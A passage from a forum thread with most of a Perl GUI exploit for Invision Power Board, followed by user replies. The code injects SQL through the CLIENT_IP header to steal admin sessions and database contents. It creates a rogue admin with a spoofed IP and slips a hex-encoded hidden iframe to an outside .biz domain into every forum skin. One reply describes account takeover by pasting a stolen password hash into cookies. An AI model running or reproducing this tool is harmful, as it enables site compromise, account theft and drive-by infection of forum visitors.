                    if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $session_user_id = $3; }
                } else {
                    $session_user_id = $user_id;
                }
                $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
                if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $group = $3; }
                $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
                if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $name = $3; }
            }
            $InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold', -foreground => 'Green')->pack;
            $InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack;
            $InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack;
            $InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack;
            $InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack;
            $InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack;
            $InfoWindow->Show();
            $InfoWindow->destroy;
        }
    } else {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
        $InfoWindow->Show();
        $InfoWindow->destroy;
    }
    if ($error) {
        $InfoWindow->add('Label', -text => 'Can\'t get admin session.', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack;
        $InfoWindow->Show();
        $InfoWindow->destroy;
    }
}

sub get_data() {
    $xpl = LWP::UserAgent->new() or die;
    $InfoWindow = $mw->DialogBox(-title => 'get data from database', -buttons => ["OK"]);
    if ($table eq 'members')          { $id_text = 'id'; }
    if ($table eq 'members_converge') { $id_text = 'converge_id'; }
    $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." WHERE ".$id_text."=".$user_id."/*");
    if ($res->is_success) {
        $rep = '';
        if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) {
            $report = $3;
        } else {
            $InfoWindow->add('Label', -text => 'Can\'t get data from database', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
            $InfoWindow->Show();
            $InfoWindow->destroy;
        }
    } else {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
        $InfoWindow->Show();
        $InfoWindow->destroy;
    }
}

sub create_admin() {
    $InfoWindow = $mw->DialogBox(-title => 'create new admin', -buttons => ["OK"]);
    if ($session_id eq '' || $session_ip_address eq '') {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack;
    } elsif ($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack;
    } else {
        $xpl = LWP::UserAgent->new() or die;
        ($url2 = $url) =~ s/index\.php/admin\.php/;
        $cf = '';
        %fields = (
            'code'     => 'doadd',
            'act'      => 'mem',
            'section'  => 'content',
            'name'     => $new_admin_name,
            'password' => $new_admin_password,
            'email'    => $new_admin_email,
            'mgroup'   => $group,
        );
        if ($use_custom_fields) {
            @cf = split(',', $custom_fields);
            foreach (@cf) { ($k, $v) = split('=', $_); $fields{$k} = $v; }
        }
        # the stolen admin session is bound to the admin's IP, which the IP headers spoof
        $res = $xpl->post($url2."?adsess=$session_id", [ %fields ], 'USER_AGENT' => '', 'CLIENT_IP' => "$session_ip_address", 'X_FORWARDED_FOR' => "$session_ip_address");
        # NOTE: nothing in the post explains this hex literal. It decodes to a hidden 1x1
        # <iframe> pointing at a third-party .biz domain, and the request below appends it
        # to every skin wrapper: the "exploit" silently plants that iframe on the whole forum.
        $if = '0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E';
        $query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")";
        $res = $xpl->post($url2."?adsess=$session_id", [ 'code' => 'runsql', 'act' => 'sql', 'section' => 'admin', 'query' => $query ], 'USER_AGENT' => '', 'CLIENT_IP' => "$session_ip_address", 'X_FORWARDED_FOR' => "$session_ip_address");
        $InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold', -foreground => 'green')->pack;
        $InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack;
    }
    $InfoWindow->Show();
    $InfoWindow->destroy;
}

sub test_vuln() {
    $InfoWindow = $mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK"]);
    $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
    $xpl = LWP::UserAgent->new() or die;
    $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "' UNION SELECT 'VULN',1,1,1/*");
    if ($res->is_success) {
        $rep = '';
        if ($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
        if ($rep eq 'VULN') {
            $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        } else {
            $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold', -foreground => 'green')->pack;
        }
    } else {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
    }
    $InfoWindow->Show();
    $InfoWindow->destroy;
}

sub get_prefix() {
    $InfoWindow = $mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK"]);
    $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
    $xpl = LWP::UserAgent->new() or die;
    # a lone quote breaks the query and the SQL error message leaks the table prefix
    $res = $xpl->get($url."?s=$rand_session", 'USER_AGENT' => '', 'CLIENT_IP' => "'");
    if ($res->is_success) {
        $rep = '';
        if ($res->as_string =~ /FROM (.*)sessions/) {
            $prefix = $1;
            $InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack;
        } else {
            $InfoWindow->add('Label', -text => 'Can\'t get prefix', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        }
    } else {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold', -foreground => 'red')->pack;
        $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
    }
    $InfoWindow->Show();
    $InfoWindow->destroy;
}

sub session() { return 'r57ipb216_for_IDS'; }

# milw0rm.com [2006-07-14]
```
  17. If you have the hash of an admin/user from some IPB forum and you don't feel like cracking it, or don't have the time... you can substitute it into the cookie and you're straight into their account. Works only on Opera (9). Go to Tools>Quick preferences>Edit site preferences, choose the cookies there and you'll see: Now edit member_id and pass_hash like this:
  18. http://www.rosecurityteam.net/home/viewtop...opic.php?t=1418
  19. Welcome! But there's something I don't like about you: you have 7 posts and all of them just say "Thanks"
  20. Screech

    Fun stuff

    That's what kwerln does to us if we upset him
  21. mario23, thanks for them, but do stop at some point
  22. This one just came in to me. It's surely someone from the forum, I suspect nos... but I'm not saying it's definitely him. What a mentality: he swapped the 2 words I used for my ID and made himself another one )
  23. <div class='quotetop'>QUOTE("tester")</div> Ha Ha Ha ">SFD"ef where did you guys find this one?
  24. <div class='quotetop'>QUOTE("ghici")</div> damn it, I put it on evonet
  25. Thanks, it looks like it's worth something, but I tried it on myself and I'm not getting anything